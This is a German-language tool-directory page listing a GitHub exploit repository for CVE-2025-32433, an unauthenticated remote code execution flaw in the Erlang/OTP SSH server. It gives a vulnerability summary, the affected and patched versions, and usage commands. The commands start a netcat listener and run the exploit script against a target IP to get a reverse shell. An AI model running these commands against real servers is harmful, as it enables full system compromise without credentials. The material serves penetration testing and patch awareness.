Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32433 — CVE-2025-32433 Zusammenfassung und Angriffsübersicht | Kitploit
Tools/GitHubGitHub/mrdreamreal/cve-2025-32433
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 Zusammenfassung und Angriffsübersicht

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32433

CVE-2025-32433 Zusammenfassung und Angriffsübersicht

CVE-2025-32433 ist eine kritische, nicht authentifizierte Remote-Codeausführungs-Schwachstelle (RCE) im Erlang/OTP SSH-Server, die am 16. April 2025 veröffentlicht wurde. Erlang/OTP SSH ist eine Bibliothek, die in verschiedenen verteilten und Telekommunikationsanwendungen verwendet wird. Der Fehler entsteht durch eine unsachgemäße Behandlung von SSH-Protokollnachrichten: Der Server setzt die normale Authentifizierungssequenz nicht durch, sodass ein Angreifer vor der Authentifizierung speziell gestaltete SSH-Nachrichten senden kann. Dadurch kann der Angreifer beliebigen Erlang-Code auf dem Server einschleusen und ausführen​ nvd.nist.gov ​ offsec.com . In der Praxis bedeutet dies, dass ein Angreifer mit Netzwerkzugriff auf einen anfälligen Erlang/OTP SSH-Server (der oft als Root läuft) eine Reverse-Shell auslösen oder Befehle ohne Anmeldedaten ausführen kann, was zu einer vollständigen Systemkompromittierung führt​ nvd.nist.gov ​ offsec.com . Diese Schwachstelle hat einen CVSS-Score von 10.0 (maximale Schwere)​ offsec.com .

Betroffen sind alle Erlang/OTP-Versionen unterhalb von OTP-27.3.3, OTP-26.2.5.11 oder OTP-25.3.2.20 (die gepatchten Versionen)​ nvd.nist.gov ​ offsec.com . Betroffene Systeme umfassen häufig Linux-Server oder -Geräte, die einen Erlang-basierten SSH-Daemon ausführen (nicht zu verwechseln mit OpenSSH). Wichtig: Standard-OpenSSH-Server unter Linux/BSD sind nicht anfällig​ offsec.com . Benutzer sollten davon ausgehen, dass jeder exponierte Erlang/OTP SSH-Server betroffen ist, und umgehend die offiziellen Patches anwenden oder den SSH-Dienst deaktivieren.

Der Angriff funktioniert, indem eine SSH-Verbindung initiiert und dann eine Sequenz von SSH-Nachrichten außer der Reihe gesendet wird. :

Verwendung:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

Bsp.:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

Tool herunterladen